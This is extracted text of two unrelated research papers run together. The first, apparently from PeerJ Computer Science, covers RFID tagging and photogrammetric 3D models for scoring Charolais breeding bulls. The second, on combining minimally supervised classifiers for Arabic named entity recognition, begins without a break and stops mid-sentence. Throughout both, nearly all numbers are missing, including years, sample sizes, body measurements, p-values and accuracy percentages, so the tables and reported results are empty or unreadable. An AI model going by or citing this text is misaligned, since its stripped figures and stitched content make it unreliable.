in view of this aspect, the very accurate selection of breeding bulls and cows by the farmer is carried out to optimise production performance, which represents the main economic driver of beef cattle herds. in light of recent research conducted worldwide and of the ever more sophisticated genomic techniques, the latest achievements by genetic investigations on beef cattle (burrow & dillon, ; voisinet et al., ; gibb et al., ; sowell et al., ; burrow & corbet, ; schwartzkopf-genswein, atwood & mcallister, ; robinson & oddy, ; nkrumah et al., ; moore, mrode & coffey, su et al., ; leal et al., ; fonseca et al., ; soulat et al., ) outline the need to obtain very specialized morphological lines of animals, with typical body measurements and breed conformation. several breeds of genetically selected beef cattle are acknowledged worldwide to be of elevated performance, and the charolaise breed is one of these. this cattle breed originated in bourgogne (france) and is characterized by the high quality of meat and acclimation characteristics (briggs & briggs, ). nowadays, charolaise beef cattle can be considered cosmopolite farm animals for meat production, along with some other breeds acknowledged worldwide to be selected for highly specialized traits. in italy, the association of charolaise and limousine farmers (a.n.a.c.l.i.) was founded in with the creation of breed registry records at national level. the presence of the charolaise breed in italy is considerable and the sardinia region contributes considerably to italian cappai et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. beef meat production in terms of the number of heads raised ( , charolaise heads; source a.n.a.c.l.i.: http://www.anacli.it/website/index.php?&pagid= &sessione=). breeding bulls are selected by the farmer according to the type of herd and management. the most common type belongs to the ‘‘souche bouchér’’ line for the production of offspring with high live weight at birth and rapid skeletal and muscular development. heifers or steers are normally slaughtered at an age of – months and weight to slaughter of about kg. the economic value of the breeding bull is strongly influenced by the morphological evaluation carried out in regional and national fairs for livestock, in which animals are scored by breed experts. as recently evaluated in a bio-economic model by leal et al. ( ), the dressing percentage, associated with carcass weight at slaughter and relative yield, in angus cattle is that with the largest economic value within herd productions. this concept may be applied to all beef cattle breeds. it is important to underline that while advanced omic technologies have been used for decades in livestock sciences with particular regard to cattle, the evaluation of morphology through the scoring system of animals still conserves old-fashioned methods. the score attributed to the morphology of the breeding bull has an impact on the economic value of the animal and its progeny and increases the visibility of the farmer, who selects and raises animals for competitions. at present, different morphological sections are scored through an evaluation grid displaying a d schematic illustration of the generic bovine (fig. ). the score sheet reported in fig. displays the official scoring system adopted by the a.n.a.c.l.i. ( ). 
breed experts judge animals in annual competitions on the basis of a semi-quantitative evaluation, based on the harmonic proportions of animal development, the morphology of anatomical districts and functional traits with direct impact on carcass composition. to a great extent, the overall evaluation is based on the experience of the breed evaluator and is carried out by classifying the animal according to: ( ) muscular condition; ( ) skeletal development; ( ) functional traits; ( ) breed-specific traits. at present, this system appears to be technologically outdated if compared with the advanced technologies underlying the achievements of modern breed traits. in view of this gap, smart technologies largely adopted in the beef cattle sector (such as rfid, omic sciences, artificial insemination) have great potential for system improvement, as these may provide valid tools to implement the process for the evaluation of the breeding bull in a modern system. against this backdrop, the goal of a competitive strategy relies on profitable and sustainable productions with regard to external competition (environmental or extrinsic competition) to strengthen the competitive internal advantages.

precision livestock farming (plf) has entered livestock farms relatively recently. the efficiency of management was to be improved by way of smart technologies in terms of several aspects of the everyday breeding practices of food producing animals (banhazi et al.; berckmans; fournel, rousseau & laberge), particularly of cattle. it was hypothesized that the contactless, real-time and digitalized recording of animal data could be the starting point to both internal and external competitive evaluation of the charolaise breeding bull. in particular, d imaging is a technology that is widely deployed in several sectors. in livestock, the deployment of the technology based on d digital imaging is in its infancy, and the few papers on this topic testify to the cutting-edge research exploring this new frontier of plf (wu et al.; kosgro; d'eath et al.).

figure : actual d grid used for morphology scoring in beef cattle. the scheme displays both somatometric measures and conformation scoring of beef cattle. adapted from a.n.a.c.l.i. (http://www.anacli.it/website/index.php?&pagid= &sessione=).

this paper describes an innovative and technological method that was explored to assess the potential of the integration of rfid for animal identification with d images of the real bull for the evaluation of the charolaise breeding bull. this research was undertaken with the aim of: (a) carrying out a swot analysis to identify the strengths, weaknesses, opportunities and threats of traditional vs. innovative processes of morphology evaluation; (b) testing the opportunity offered by the d digital model of the real animal in comparison to the d grid of the scoring system based on biometric measures in the perspective of a digital archive creation for e-commerce.
material and methods
animal care and identification
the animals involved in this study were cared for according to european union legislation on animal protection and welfare (eu reg / /eu). the trial involved two charolaise bulls from the same farm which were and years old, multi-champions of breed and category both at regional and national level. the two bulls enrolled in the trial possess high morphological and genetic value and serve as breeders for all the cows raised on the same farm (total heads raised excluding calves = ). in addition, their semen is also sold for artificial insemination (ai) on other farms. bulls on one farm can also serve several other farms, thus the impact on offspring is multiplied for the desirable traits that farmers intend to introduce to their own herd. raising too many breeding bulls in the same herd would not be economically viable, because ai can provide high profits with few, but highly selected, animals. the choice to involve these two breeding bulls was therefore driven by conventional farm management practices on one hand and by their morphological value on the other. each bull was electronically identified, on a voluntary basis, with an endoruminal bolus ( g, × mm rumitag bolus®) holding a passive hdx transponder (radio frequency . khz, . × . mm, iso - tiris mm). in compliance with current european mandatory rules (eu reg / ) for the individual identification of cattle, the bulls were also identified with double plastic eartags.

in vivo body measuring of the animals
both bulls (body weight between . and . tons) were individually handled in two distinct moments and temporarily placed in a paddock with a flat concrete floor to allow the recording of body measurements. wither's height, trunk length and distance at thighs were taken with the lydtin stick, on repeated measures until reaching the same value for three replicates. in this regard, it is necessary to highlight that, while stressful conditions were kept to a minimum and the animals were familiar with the facilities and personnel, any sudden movement of the bull may require several repetitions to measure one single parameter until a repeatable and acceptable value could be safely achieved. all measurements were recorded and used to calculate the sensitivity and accuracy of in vivo vs. d model measurements.

in field image capturing
the acquisition of d digital pictures of the animal was carried out in a geo-referenced system (fig. ), where the bull stood in the centre of a circle (r = m) purposely drawn on the floor, in an area outside the barn, in natural daylight but in the shade of a shelter. the operator captured images with a digital camera integrated in a mobile phone ( mpx, focus length . mm, exposure / ) and moved along the circumference, where reference points of known dimensions were located.

figure : geo-referenced °-image capture system in farm. the operator captured multiple consequent images with an overlap of at least %, moving around the bull that stood in the center of the circle.

the choice to use an integrated camera in a mobile phone was made to test whether a device that is easily available could be suitable for this purpose. the number of pictures taken from the different angles was determined on replicates until reaching the least frame capturing to obtain the best d textured model.
the overlap extent of sequential images taken along the circumference was no less than %.

post acquisition processing
the sets of images were elaborated with agisoft photoscan (agisoft llc ©, russia) software, capable of performing photogrammetric processing of digital images and generating d spatial data, with the algorithm based on structure from motion (sfm). through different consecutive steps starting from the chunk (the original digital image), the relative set of masks is created with the purpose of eliminating objects (masking the unnecessary objects of the picture) from the background (fig. ). the pictures are then aligned and a dense point cloud is generated (fig. ). through the mesh of dense point clouds, the software finalizes the procedure through texturing and builds up the so-called 'doll' model, from which the d model can be exported into different digital formats (a minimal scripting sketch of this pipeline is given at the end of this section, after the description of the swot analysis).

figure : series of masks generated from the chunks to eliminate unnecessary background objects.
figure : results from the dense point cloud of the charolaise bull.

table : scheme of the swot analysis carried out on the basis of intrinsic and extrinsic factors of the innovation of process for charolaise bull morphology valorization.
intrinsic factors: strengths | weaknesses
extrinsic factors, opportunities: development of strategies to increase opportunities (strengths) | minimization of threats to improve opportunities (weaknesses)
extrinsic factors, threats: exploit strengths to reduce threats (strengths) | planning of strategies of defense to reduce threats (weaknesses)

swot analysis of the process 'as is' vs. 'to be'
the bottom-up analysis of strengths, weaknesses, opportunities and threats was based on the potential of the introduction of the d image technology compared with the current scoring system for the beef bull:
• definition of objectives
• identification of users' needs
• strategies to enhance value
• definition and improvement of services
the swot analysis is based on intrinsic and extrinsic factors of the process that were analyzed as reported in table . in this context, the opportunity offered by electronic identification was explored in the perspective of the creation of a virtual database where d images of bulls could be uploaded with the individual electronic identification code and the farm of origin. the implementation of the system with the introduction of such a new technological tool within the process would contribute to identifying the objectives to satisfy the concept expressed by guatri, according to whom the final goal of business relies on the capability of continuous auto-regeneration over time, with the sustainable creation of economic value. in light of the evaluation of the system 'as is' (based on the current d evaluation score) and 'to be' (after the development of the d model for digital archiving and digital data sharing), the swot analysis was conducted to explore the introduction of d innovations to instrumental management for the evaluation of the breeding bull.
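the photogrammetric workflow described above (chunk, masking, alignment, dense point cloud, mesh, texture, export) can also be scripted rather than run interactively. the sketch below is a minimal, hypothetical python example written against the agisoft metashape python api (the successor of photoscan); the function names follow metashape . x and are an assumption here, since they differ between photoscan and later metashape releases, and the input folder and output paths are placeholders.

```python
# minimal sketch of the photogrammetric pipeline described above.
# assumption: agisoft metashape 1.x python module; names differ in other versions.
import glob
import Metashape

photos = sorted(glob.glob("bull_photos/*.jpg"))   # hypothetical input folder

doc = Metashape.Document()
chunk = doc.addChunk()
chunk.addPhotos(photos)

# align the overlapping pictures (feature matching + camera alignment)
chunk.matchPhotos()
chunk.alignCameras()

# build the dense point cloud from depth maps
chunk.buildDepthMaps()
chunk.buildDenseCloud()

# mesh the dense cloud and texture the resulting 'doll' model
chunk.buildModel(source_data=Metashape.DenseCloudData)
chunk.buildUV()
chunk.buildTexture()

# export the textured 3d model to a standard interchange format
chunk.exportModel("bull_model.obj")
doc.save("bull_project.psx")
```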
this evaluation therefore focused on the specific extrinsic and intrinsic factors of the evaluation process to test whether the reduction of the technological gap on the farm (bottom) offers opportunities for and/or poses threats to the creation of economic value for farmers and, potentially, for stakeholders (scale-up).

calculations, data analysis and statistics
a series of measurements for wither's height, body length and rear trimness was carried out in vivo on each bull and on the respective d virtual model, until reaching the same value for three replicates. the positive predictive value (ppv), sensitivity (or true positive rate, tpr), specificity (or true negative rate, tnr) and accuracy (acc) of the biometric measurements determined on the d model in comparison with those retrieved from the real animal were calculated using the following formulas (a short computational sketch of these figures is given below, after the body-measure table):

$ppv = \frac{tp}{tp + fp} \times 100$; $\quad tpr = \frac{tp}{tp + fn} \times 100$; $\quad tnr = \frac{tn}{tn + fp} \times 100$; $\quad acc = \frac{tp + tn}{tp + tn + fp + fn} \times 100$,

where tp is the number of virtual measurements matching with the real measurements, fp is the number of different virtual measurements matching with the real measurements, tn is the number of different virtual measurements differing from the real measurements, and fn is the number of virtual measurements differing from the real measurements. the analysis of variance between the means of the two series of measurements collected in vivo and on the d virtual model was carried out by anova with sas . (sas inst. inc., cary, nc). results were considered statistically significant when p < . .

figure : body measure taken on the d-bull model. sequence of the topline (a), wither's height (b) and rear trimness (c).

results
the least frame capturing required images in this trial, with an at least % overlap between subsequent pictures on a ° total capturing per bull. the operator moved around the animal in the geo-referenced system, which allowed body proportions to be established. the process of image capturing took between ′ and ′ per bull. somatic measurements collected in vivo and on the d-bull (fig. ) did not differ in a significant way. when comparing the two systems for taking somatic measurements, the fact that no statistical significance between in vivo and virtual values was detected appeared highly encouraging for the adoption of the system in the field. table summarizes the results on d bull performance. in table , results from the swot analysis are reported. on the basis of the series of measurements carried out both in vivo and on the d bull, the positive predictive value and the accuracy of the system turned out to range from % to % for the three sets of body measurements for wither's height, body length and rear trimness.

table : body measures of the live animal and respective d model. in vivo and virtual values are reported as means and pooled sd, expressed in metres. statistical significance is set at p-value < . .
body measures (m)   in vivo   virtual   pooled-sd   p-value
topline             .         .         .           .
wither height       .         .         .           .
rear trimness       .         .         .           .
performance of the d bull: tpr %, tnr %, ppv %, accuracy %
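for clarity, the sketch below shows how the four performance figures defined above can be computed and how the in vivo and virtual series can be compared with a one-way anova. it is a minimal illustration: the study used sas, scipy is used here only as an example, and the sample counts and measurement values are hypothetical, not data from the trial.

```python
# minimal sketch of the performance figures defined above and of the
# in vivo vs. virtual comparison; the example values are illustrative only.
from scipy import stats

def performance(tp, fp, tn, fn):
    ppv = 100.0 * tp / (tp + fp)                    # positive predictive value
    tpr = 100.0 * tp / (tp + fn)                    # sensitivity (true positive rate)
    tnr = 100.0 * tn / (tn + fp)                    # specificity (true negative rate)
    acc = 100.0 * (tp + tn) / (tp + tn + fp + fn)   # accuracy
    return ppv, tpr, tnr, acc

# one-way anova between the in vivo and virtual replicates of one body measure
in_vivo = [1.52, 1.53, 1.52]     # hypothetical wither height replicates (m)
virtual = [1.51, 1.52, 1.52]     # hypothetical measures on the 3d model (m)
f_stat, p_value = stats.f_oneway(in_vivo, virtual)

print(performance(tp=5, fp=1, tn=5, fn=1), p_value)
```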
table : scheme of the swot analysis emerged from the analysis of the process for charolais bull morphology valorization.
swot analysis: valorization of charolais breeding bull morphology
intrinsic factors, strengths: competitiveness of bull genetic value; experienced farmers; worldwide market; ai diffused for semen trade; high dressing % of progeny.
intrinsic factors, weaknesses: restrictions of animal movement; costs of transport; stressful conditions; technology delay.
extrinsic factors, opportunities: visibility of bull morphology; generational change; automation of operations; limited investment to update the system; virtual net of buyers/suppliers; e-commerce potentials.
extrinsic factors, threats: aging population; ethical trends on animal product consumption; old-fashioned scoring system; climate change; standardization of the system; infectious disease.

discussion
the opportunity offered by d digital imaging to carry out body measurements on a d-bull model improves the current system of morphological scoring considerably by objectifying evaluations. indeed, the d grid with a schematic illustration of the generic bovine has to be filled in manually and does not allow any automation. on the other hand, the d bull is a faithful reproduction of the live animal, and is hence highly suitable for the morphological evaluation and appraisal of the genetic potential as a breeding bull through the phenotype. among the advantages offered by the d bull model, the collection of body measurements can be carried out in a safe way, much more comfortably for both the breed evaluator and the bull. in fact, fairs and the presence of other bulls during the scoring process may represent a stressful condition for the animal, which may react to the environmental stimuli in unpredictable ways. while expert personnel and animal-friendly facilities are provided during fairs, safe conditions for operators and animal protection may be improved by the evaluation of the virtual model. additionally, d digital images of bulls saved in purposely created virtual archives may ease access and the sharing of data among stakeholders. such digital archives can greatly improve the visibility of the genetic (through the individual electronic code for genealogy) and phenotypic (morphological) value of the bull and potentially broaden the horizons of e-commerce if made available to a network of stakeholders. this opportunity opens up a series of considerations connected with different aspects of beef cattle management. when artificial insemination (ai) is used, the opportunity offered by the digital evaluation of bull morphology would allow the creation of a virtual archive for the e-commerce of semen from bulls with a high profile for functional traits. in the swot analysis of the evaluation process of charolaise bull morphology, we identified internal weaknesses in the costs of animal transport and animal welfare issues, both during transportation and exposition in dedicated fairs.
in the 'as is' process, the farmer must subscribe bulls to dedicated fairs both at regional and national levels, for which economic resources must be set aside to cover travel and subscription costs. in the 'to be' process, the farmer will be able to subscribe animals to online virtual fairs, where animal morphology can be accessed by other remote subscribers and stakeholders thanks to the electronic code associated with the d model of the live bull. in this way, internal weaknesses can be minimized. the possibility of having a virtual archive where digital images of animals can be reached by stakeholders means that the animals do not have to be moved from the farm, hence offering substantial savings on travel costs. reducing stress for the animals due to handling and their being loaded onto means of transport to reach unfamiliar settings is in agreement with other efficient solutions proposed by plf (banhazi et al.; berckmans) to optimise breeding and management practices on site. however, as the system is somewhat advanced, some stakeholders may be unready for the technology and this may lead to a delay in the standardization of the d-model based system.

electronic identification through rfid technology represents both a sound and reliable method for animal identification and a very promising system for the implementation of a virtual archive of recorded animals through the electronic digital number of the transponder, as observed in other filières (cappai et al.; cappai, rubiu & pinna). in the case of the electronically identified d bull, the record was implemented with d virtual images. the d-bull model for morphological evaluation through a scoring system has a series of indirect advantages, related to both animal health and welfare. the evaluation of the morphology of animals raised on farms can be promoted also when sanitary restrictions to the movement of animals are in force. as an external threat considered in the swot analysis, the presence of infectious diseases may impact negatively on animal movements outside the farm. for instance, in the case of blue tongue positivity in sheep of a given region, cattle movements are also restricted, as bovines are a natural reservoir of the virus despite not being clinically involved. thus, participation in fairs, as well as movement for trading, are forbidden, with consequent profit losses.

the swot analysis pointed to different opportunities offered by the introduction of the d model for the evaluation of bull morphology oriented to an up-to-date competitive strategy for the sector. in fact, the analysis of the process 'as is' and 'to be' clearly highlights how the digital d model performance, on the basis of the ppv, can implement the evaluation system in a smart, contactless and automated way, which is easily shareable and accessible, whereas the d scoring system does not. the threat of external factors may be the most difficult aspect to deal with. so-called red meat consumption may decrease in the future, unless appropriate marketing strategies and adequate public information are prompted. this threat was considered in the swot analysis due to the increasingly aging population and their choice to prefer so-called 'white meat' (that of poultry and rabbit). in addition, climate changes may pose the question of environmentally sustainable farming systems, with a potential contraction of meat consumption.
finally, ethical movements against animal product consumption may also influence market choices.

conclusions
the results obtained from testing the feasibility of an innovative and technologically advanced methodological approach based on the implementation of an rfid and d imaging system aimed to provide a general overview of the valuable opportunities offered by the upgrade of the current system. the instrumental evaluation of bull morphology of the charolaise breed in a completely digital d image successfully reflects the morphology of the live animal. the upgrade into a high-tech system for the evaluation of the breeding bull shows several potential applications, as illustrated in the swot analysis leading to the innovation of the process. in perspective, the opportunities offered by such an innovative methodological approach may lead to the scale-up of the integrated system based on individual rfid identification along with the d digital image of the bull. in fact, the model has the potential for virtual archive creation, and the experimental approach appears highly encouraging for further work to check scalability to a large number of animals.

acknowledgements
the authors would like to thank mr. michele filigheddu for his cooperation during fieldwork activities on his farm and for providing basic production data. the authors are also thankful to dr. santino cherchi for his help during the study. the authors express their gratitude to a.n.a.c.l.i.

additional information and declarations
funding: the authors received no funding for this work.
competing interests: nicola graziano rubiu is the administrator and technical director of nureid. the authors declare there are no competing interests.
author contributions:
• maria grazia cappai conceived and designed the experiments, prepared figures and/or tables, authored or reviewed drafts of the paper, approved the final draft.
• filippo gambella conceived and designed the experiments, contributed reagents/materials/analysis tools, performed the computation work, approved the final draft.
• davide piccirilli performed the experiments, prepared figures and/or tables, performed the computation work, approved the final draft.
• nicola graziano rubiu analyzed the data, authored or reviewed drafts of the paper, approved the final draft, analysis of process and swot analysis.
• corrado dimauro performed the experiments, analyzed the data, approved the final draft.
• antonio luigi pazzona contributed reagents/materials/analysis tools, performed the computation work, approved the final draft.
• walter pinna contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft.
data availability: the database of raw biometric measures from the live animal and the d model is available in the supplemental materials.
supplemental information: supplemental information for this article can be found online at http://dx.doi.org/ . /peerj-cs. #supplemental-information.

references
banhazi tm, lehr h, black jl, crabtree h, schofield p, tscharke m, berckmans d. precision livestock farming: an international review of scientific and commercial aspects. international journal of agricultural and biological engineering ( ): .
berckmans d. precision livestock farming technologies for welfare management in intensive livestock systems.
revue scientifique et technique-office international des epizooties ( ): - .
briggs hm, briggs dm. modern breeds of livestock. fourth edition. london: macmillan.
burrow hm, corbet nj. genetic and environmental factors affecting temperament of zebu and zebu-derived beef cattle grazed at pasture in the tropics. australian journal of agricultural research : - .
burrow hm, dillon rd. relationship between temperament and growth in a feedlot and commercial carcass traits in bos indicus crossbreds. australian journal of experimental agriculture : - .
cappai mg, picciau m, nieddu g, bitti mpl, pinna w. long term performance of rfid technology in the large scale identification of small ruminants through electronic ceramic boluses: implications for animal welfare and regulation compliance. small ruminant research : - .
cappai mg, rubiu ng, nieddu g, bitti mpl, pinna w. analysis of fieldwork activities during milk production recording in dairy ewes by means of individual ear tag (et) alone or plus rfid based electronic identification (eid). computers and electronics in agriculture : - .
cappai mg, rubiu ng, pinna w. economic assessment of a smart traceability system (rfid+dna) for origin and brand protection of the pork product labelled suinetto di sardegna. computers and electronics in agriculture : - .
d'eath rb, jack m, futro a, talbot d, zhu q, barclay d, baxter em. automatic early warning of tail biting in pigs: d cameras can detect lowered tail posture before an outbreak. plos one ( ):e .
de souza fonseca pa, id-lahoucine s, reverter a, medrano jf, fortes ms, casellas j, miglior f, brito l, carvalho mrs, schenkel fs, nguyen lt, porto-neto lr, thomas mg, cánovas a. combining multi-omics information to identify key-regulator genes for pleiotropic effect on fertility and production traits in beef cattle. plos one.
fournel s, rousseau an, laberge b. rethinking environment control strategy of confined animal housing systems through precision livestock farming. biosystems engineering : - .
gibb dj, mcallister ta, huisma c, wiedmeier rd. bunk attendance of feedlot cattle monitored with radio frequency technology. canadian journal of animal science : - .
guatri l. la teoria di creazione del valore. milano: egea.
kosgro j. estimation of pig weight using a microsoft kinect prototype imaging system. computers and electronics in agriculture : - .
leal ws, costa rf, cardoso ll, mendonça fs, cardoso ff, yokoo mj, weaber rl. bio-economic model predicts economic values for beef production. kansas agricultural experiment station research reports : - .
moore kl, mrode r, coffey mp.
genetic parameters of visual image analysis primal cut carcass traits of commercial prime beef slaughter animals. animal ( ): - .
nkrumah jd, crews jr dh, basarab ja, price ma, okine ek, wang z, li c, moore ss. genetic and phenotypic relationships of feeding behavior and temperament with performance, feed efficiency, ultrasound, and carcass merit of beef cattle. journal of animal science : - .
robinson dl, oddy vh. genetic parameters for feed efficiency, fatness, muscle area and feeding behavior of feedlot finished beef cattle. livestock production science : - .
schwartzkopf-genswein ks, atwood s, mcallister ta. use of remote bunk monitoring to record effect of breed, feeding regime and weather on feeding behavior and growth performance of cattle. canadian journal of animal science : - .
soulat j, picard b, léger s, monteils v. prediction of beef carcass and meat quality traits from factors characterising the rearing management system applied during the whole life of heifers. meat science : - .
sowell bf, bowman jgp, branine me, hubbard me. radio frequency technology to measure feeding behavior and health of feedlot steers. applied animal behaviour science : - .
su h, golden b, hyde l, sanders s, garrick d. genetic parameters for carcass and ultrasound traits in hereford and admixed simmental beef cattle: accuracy of evaluating carcass traits. journal of animal science ( ): - .
voisinet bd, grandin t, tatum jd, o'connor sf, struthers jj. feedlot cattle with calm temperaments have higher average daily gains than cattle with excitable temperaments. journal of animal science : - .
wu j, tillett r, mcfarlane njb, ju x, siebert jp, schofield. extracting the three-dimensional shape of live pigs using stereo photogrammetry. computers and electronics in agriculture ( ): - .

combining minimally-supervised methods for arabic named entity recognition
maha althobaiti, udo kruschwitz, and massimo poesio
school of computer science and electronic engineering, university of essex, colchester, uk
{mjaltha, udo, poesio}@essex.ac.uk
transactions of the association for computational linguistics. action editor: ryan mcdonald. © association for computational linguistics, distributed under a cc-by-nc-sa . license.

abstract
supervised methods can achieve high performance on nlp tasks, such as named entity recognition (ner), but new annotations are required for every new domain and/or genre change. this has motivated research in minimally supervised methods such as semi-supervised learning and distant learning, but neither technique has yet achieved performance levels comparable to those of supervised methods. semi-supervised methods tend to have very high precision but comparatively low recall, whereas distant learning tends to achieve higher recall but lower precision. this complementarity suggests that better results may be obtained by combining the two types of minimally supervised methods. in this paper we present a novel approach to arabic ner using a combination of semi-supervised and distant learning techniques.
we trained a semi-supervised ner classifier and another one using distant learning techniques, and then combined them using a variety of classifier combination schemes, including the bayesian classifier combination (bcc) procedure recently proposed for sentiment analysis. according to our results, the bcc model leads to an increase in performance of percentage points over the best base classifiers.

introduction
supervised learning techniques are very effective and widely used to solve many nlp problems, including ner (sekine and others; benajiba et al., a; darwish). the main disadvantage of supervised techniques, however, is the need for a large annotated corpus. although a considerable amount of annotated data is available for many languages, including arabic (zaghouani), changing the domain or expanding the set of classes always requires domain-specific experts and new annotated data, both of which demand time and effort. therefore, much of the current research on ner focuses on approaches that require minimal human intervention to export the named entity (ne) classifiers to new domains and to expand ne classes (nadeau; nothman et al.). semi-supervised (abney) and distant learning approaches (mintz et al.; nothman et al.) are alternatives to supervised methods that do not require manually annotated data. these approaches have proved to be effective and easily adaptable to new ne types. however, the performance of such methods tends to be lower than that achieved with supervised methods (althobaiti et al.; nadeau; nothman et al.).

we propose combining these two minimally supervised methods in order to exploit their respective strengths and thereby obtain better results. semi-supervised learning tends to be more precise than distant learning, which in turn leads to higher recall than semi-supervised learning. in this work, we use various classifier combination schemes to combine the minimal supervision methods. most previous studies have examined classifier combination schemes to combine multiple supervised-learning systems (florian et al.; saha and ekbal), but this research is the first to combine minimal supervision approaches. in addition, we report our results from testing the recently proposed independent bayesian classifier combination (ibcc) scheme (kim and ghahramani; levenberg et al.) and comparing it with traditional voting methods for ensemble combination.

background
. arabic ner
a lot of research has been devoted to arabic ner over the past ten years. much of the initial work employed hand-written rule-based techniques (mesfar; shaalan and raza; elsebai et al.). more recent approaches to arabic ner are based on supervised learning techniques. the most common supervised learning techniques investigated for arabic ner are maximum entropy (me) (benajiba et al., b), support vector machines (svms) (benajiba et al.), and conditional random fields (crfs) (benajiba and rosso; abdul-hamid and darwish). darwish presented cross-lingual features for ner that make use of the linguistic properties and knowledge bases of another language.
in his study, english capitalisation features and an english knowledge base (dbpedia) were exploited as dis- criminative features for arabic ner. a large ma- chine translation (mt) phrase table and wikipedia cross-lingual links were used for translation between arabic and english. the results showed an overall f-score of . % with an improvement of . % over a strong baseline system on a standard dataset (the anercorp set collected by benajiba et al. ( a)). abdallah et al. ( ) proposed a hybrid ner system for arabic that integrates a rule-based sys- tem with a decision tree classifier. their inte- grated approach increased the f-score by between % and % when compared to the original rule based system and the pure machine learning tech- nique. oudah and shaalan ( ) also developed hybrid arabic ner systems that integrate a rule- based approach with three different supervised tech- niques: decision trees, svms, and logistic regres- sion. their best hybrid system outperforms state-of- the-art arabic ner systems (benajiba and rosso, ; abdallah et al., ) on standard test sets. . minimal supervision and ner much current research seeks adequate alternatives to expensive corpus annotation that address the limita- tions of supervised learning methods: the need for substantial human intervention and the limited num- ber of ne classes that can be handled by the system. semi-supervised techniques and distant learning are examples of methods that require minimal supervi- sion. semi-supervised learning (ssl) (abney, ) has been used for various nlp tasks, including ner (nadeau, ). ‘bootstrapping’ is the most com- mon semi-supervised technique. bootstrapping in- volves a small degree of supervision, such as a set of seeds, to initiate the learning process (nadeau and sekine, ). an early study that introduced mutual bootstrapping and proved highly influential is (riloff and jones, ). they presented an al- gorithm that begins with a set of seed examples of a particular entity type. then, all contexts found around these seeds in a large corpus are compiled, ranked, and used to find new examples. pasca et al. ( ) used the same bootstrapping technique as riloff and jones ( ), but applied the technique to very large corpora and managed to generate one million facts with a precision rate of about %. ab- delrahman et al. ( ) proposed to integrate boot- strapping semi-supervised pattern recognition and a conditional random fields (crfs) classifier. they used semi-supervised pattern recognition in order to generate patterns that were then used as features in the crfs classifier. distant learning (dl) is another popular paradigm that avoids the high cost of supervision. it depends on the use of external knowledge (e.g., encyclopedias such as wikipedia, unlabelled large corpora, or external semantic repositories) to increase the performance of the classifier, or to automatically create new resources for use in the learning process (mintz et al., ; nguyen and moschitti, ). nothman et al. ( ) automatically created massive, multilingual training annotations for ner by exploiting the text and in- ternal structure of wikipedia. they first categorised wikipedia articles into a specific set of named entity types across nine languages: dutch, english, french, german, italian, polish, portuguese, rus- sian, and spanish. then, wikipedia’s links were transformed into named entity annotations based on the ne types of the target articles. following this approach, millions of words were annotated in the aforementioned nine languages. 
their method for automatically deriving corpora from wikipedia outperformed the methods proposed by richman and schone and by mika et al. when testing the wikipedia-trained models on conll shared task data and other gold-standard corpora. alotaibi and lee presented a methodology to automatically build two ne-annotated sets from arabic wikipedia. the corpora were built by transforming links into ne annotations according to the ne type of the target articles. pos-tagging, morphological analysis, and linked ne phrases were used to detect other mentions of nes that appear without links in text. their wikipedia-trained model performed well when tested on various newswire test sets, but it did not surpass the performance of the supervised classifier that is trained and tested on data sets drawn from the same domain.

. classifier combination and ner
we are not aware of any previous work combining minimally supervised methods for the ner task in arabic or any other natural language, but there are many studies that have examined classifier combination schemes to combine various supervised-learning systems. florian et al. presented the best system at the ner conll task, with an f-score value equal to . %. they used a combination of four diverse ne classifiers: a transformation-based learning classifier, a hidden markov model classifier (hmm), a robust risk minimization classifier based on a regularized winnow method (zhang et al.), and a me classifier. the features they used included tokens, pos and chunk tags, affixes, gazetteers, and the output of two other ne classifiers trained on richer datasets. their methods for combining the results of the four ne classifiers improved the overall performance by - % when compared with the best performing classifier. saha and ekbal studied classifier combination techniques for various ner models under single and multi-objective optimisation frameworks. they used seven diverse classifiers (naive bayes, decision tree, memory based learner, hmm, me, crfs, and svms) to build a number of voting models based on identified text features that are selected mostly without domain knowledge. the combination methods used were binary and real vote-based ensembles. they reported that the proposed multi-objective optimisation classifier ensemble with real voting outperforms the individual classifiers, the three baseline ensembles, and the corresponding single objective classifier ensemble.

two minimally supervised ner classifiers
two main minimally supervised approaches have been used for ner: semi-supervised learning (althobaiti et al.) and distant supervision (nothman et al.). we developed state-of-the-art classifiers of both types that will be used as base classifiers in this paper. our implementations of these classifiers are explained in section . and section . .

. semi-supervised learning
as previously mentioned, the most common ssl technique is bootstrapping, which only requires a set of seeds to initiate the learning process. we used an algorithm adapted from althobaiti et al., which contains three components, as shown in figure .

figure : the three components of the ssl system: pattern induction, instance extraction, and instance ranking/selection, starting from a set of seed instances.

the algorithm begins with a list of a few examples of a given ne type (e.g., 'london' and 'paris' can be used as seed examples for location entities) and learns patterns (p) that are used to find more examples (candidate nes).
these examples are even- tually sorted and used again as seed examples for the next iteration. our algorithm does not use plain frequencies since absolute frequency does not always produce good examples. this is because bad examples will be extracted by one pattern, however unwantedly, as many times as the bad examples appear in the text in relatively similar contexts. meanwhile, good exam- ples are best extracted using more than one pattern, since they occur in a wider variety of contexts in the text. instead, our algorithm ranks candidate nes ac- cording to the number of different patterns that are used to extract them, since pattern variety is a better cue to semantics than absolute frequency (baroni et al., ). after sorting the examples according to the num- ber of distinct patterns, all examples but the top m are discarded, where m is set to the number of ex- amples from the previous iteration, plus one. these m examples will be used in the next iteration, and so on. for example, if we start the algorithm with seed instances, the following iteration will start with , and the next one will start with , and so on. this procedure is necessary in order to carefully include examples from one iteration to another and to ensure that bad instances are not passed on to the next iteration. the same procedure was applied by (althobaiti et al., ). . distant learning for distant learning we follow the state of the art ap- proach to exploit wikipedia for arabic ner, as in (althobaiti et al., ). our distant learning sys- tem exploits many of wikipedia’s features, such as anchor texts, redirects, and inter-language links, in order to automatically develop an arabic ne anno- tated corpus, which is used later to train a state-of- the-art supervised classifier. the three steps of this approach are: . classify wikipedia articles into a set of ne types. . annotate the wikipedia text as follows: • identify and label matching text in the title and the first sentence of each article. • label linked phrases in the text according to the ne type of the target article. • compile a list of alternative titles for articles and filter out ambiguous ones. • identify and label matching phrases in the list and the wikipedia text. . filter sentences to prevent noisy sentences from being included in the corpus. we briefly explain these steps in the following sec- tions. . . classifying wikipedia articles the wikipedia articles in the dataset need to be classified into the set of named entity types in the classification scheme. we conduct an experiment that uses simple bag-of-words features extracted from different portions of the wikipedia document and metadata such as categories, the infobox ta- ble, and tokens from the article title and first sen- tence of the document. to improve the accuracy of document classification, tokens are distinguished based on their location in the document. there- fore, categories and infobox features are marked with suffixes to differentiate them from tokens ex- tracted from the 